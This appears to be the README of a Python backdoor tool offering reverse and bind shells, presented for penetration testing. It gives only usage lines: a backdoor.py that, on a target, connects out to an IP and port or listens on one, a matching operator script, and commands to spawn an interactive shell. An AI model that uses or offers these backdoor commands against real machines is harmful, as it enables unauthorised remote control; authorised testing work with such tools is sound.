Python Reverse-Bind Shell
Usage: >>chmod +x akhyls.py
chmod +x backdoor.py
>>./akhyls.py -R <PORT> (reverse shell)(own computer)
>>./backdoor.py --c <IP> <PORT> (connect mode)(vulnerable machines for penetration testing)
>> Interactive shell to check >> use command 'shell_check'
>>Interactive shell to spawn >> use command 'interactive_shell'
OR OR OR
>>./backdoor.py --l <PORT> (listen mode)(vulnerable machines for penetration testing)
>>./akhyls.py -B <IP> <PORT> (bind shell)(own computer)
>> Interactive shell to check >> use command 'shell_check'
>>Interactive shell to spawn >> use command 'interactive_shell'